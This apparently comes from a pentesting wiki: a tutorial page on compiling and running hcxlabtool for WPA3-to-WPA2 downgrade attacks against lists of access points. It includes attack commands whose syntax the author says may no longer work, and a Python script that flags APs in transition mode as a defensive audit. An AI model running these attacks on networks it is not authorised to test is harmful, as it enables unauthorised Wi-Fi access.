# hcxlabtool
This is an awesome [tool](https://github.com/ZerBea/wifi_laboratory) for doing WPA3 downgrade attacks!  Booyah!

*Referenced from: [this GitHub discussion](https://github.com/ZerBea/hcxdumptool/discussions/485)*

:::tip
You might just want to try using [DragonShift](pentesting/Wifi/dragonshift) as an alternative to this tool.
:::

## Install pre-reqs and compile
```
git clone https://github.com/ZerBea/wifi_laboratory.git ~/wifilab
cd ~/wifilab
sudo apt install build-essential git libpcap-dev -y
make
```

## Attack a list of APs to see if they're vulnerable to a WPA3>WPA2 downgrade attack

```
sudo ./hcxlabtool p phy0 s 15 e ../wifi_laboratory-main/ap.list f 23b
```

Where:
* `p phy0` is the name of the physical interface
* `s 15` is the stay time in seconds
* `e ap.list` is the list of AP names to attack
* `f 23b` is the channel and band to attack

:::danger
I'm not sure the syntax above actually works.  It seems this tool kind of went into "shields up" mode.  The [repo](https://github.com/ZerBea/wifi_laboratory) says "Do not report issues or feature requests."  

Below is the *old* command syntax I had up for a long time, but at the time of this page's update (2025-12-04) it looks like the syntax has totally changed so I don't think the info below is relevant:
```
sudo hcxlabtool --rds=1 --essidlist list-of-wpa3-aps.list -t 15 -c23b
```
:::
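
The downgrade in this section only applies to APs running WPA3 transition mode, meaning they advertise both a PSK and an SAE key-management suite in the RSN element of their beacons. The following is an added example, not part of hcxlabtool or of the original page, for auditing your own AP configuration: it parses an RSN element body (for instance hex copied from a packet capture) and labels the AP. The function names and the sample bytes are constructed for illustration.

```python
import struct

RSN_OUI = bytes.fromhex("000fac")
PSK_AKMS = {2, 4, 6}          # PSK, FT-PSK, PSK-SHA256
SAE_AKMS = {8, 9}             # SAE, FT-SAE
MFPC, MFPR = 0x0080, 0x0040   # RSN capability bits: MFP capable / required

def parse_rsn(body: bytes) -> dict:
    """Parse an RSN element body (element ID 48, ID and length bytes removed)."""
    if len(body) < 6 or struct.unpack_from("<H", body, 0)[0] != 1:
        raise ValueError("not a version 1 RSN element")
    off, lists = 6, []                      # skip version + group cipher suite
    for _ in range(2):                      # pairwise suite list, then AKM list
        if off + 2 > len(body):
            raise ValueError("truncated suite count")
        count = struct.unpack_from("<H", body, off)[0]
        off += 2
        if off + 4 * count > len(body):
            raise ValueError("truncated suite list")
        lists.append([body[off + 4 * i: off + 4 * i + 4] for i in range(count)])
        off += 4 * count
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    akms = {s[3] for s in lists[1] if s[:3] == RSN_OUI}
    return {"akms": akms, "mfp_capable": bool(caps & MFPC),
            "mfp_required": bool(caps & MFPR)}

def classify(rsn: dict) -> str:
    """Label the AP by the key-management suites it advertises."""
    psk, sae = rsn["akms"] & PSK_AKMS, rsn["akms"] & SAE_AKMS
    if psk and sae:
        return "transition"     # WPA2-PSK still offered: downgrade is possible
    if sae:
        return "wpa3-only" if rsn["mfp_required"] else "sae-without-mfpr"
    return "wpa2-psk" if psk else "other"

# Constructed sample RSN bodies (CCMP group/pairwise), not captured from a real AP.
SAMPLES = {
    "transition": "0100000fac040100000fac040200000fac02000fac088000",
    "wpa3-only":  "0100000fac040100000fac040100000fac08c000",
    "wpa2-psk":   "0100000fac040100000fac040100000fac020000",
}

def audit(samples=SAMPLES) -> dict:
    return {name: classify(parse_rsn(bytes.fromhex(h))) for name, h in samples.items()}

if __name__ == "__main__":
    for name, verdict in audit().items():
        print(f"{name:12} -> {verdict}")
```

An AP labelled `transition` is the configuration this page's test is looking for; moving it to SAE-only with management frame protection required removes the WPA2 fallback.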

## Additional resources
*More information about this attack [here](https://trustedsec.com/blog/the-dangers-of-transition-mode)*.  We also did a YouTube video on this downgrade attack [here](https://www.youtube.com/watch?v=VEaPuFwqQ7U).
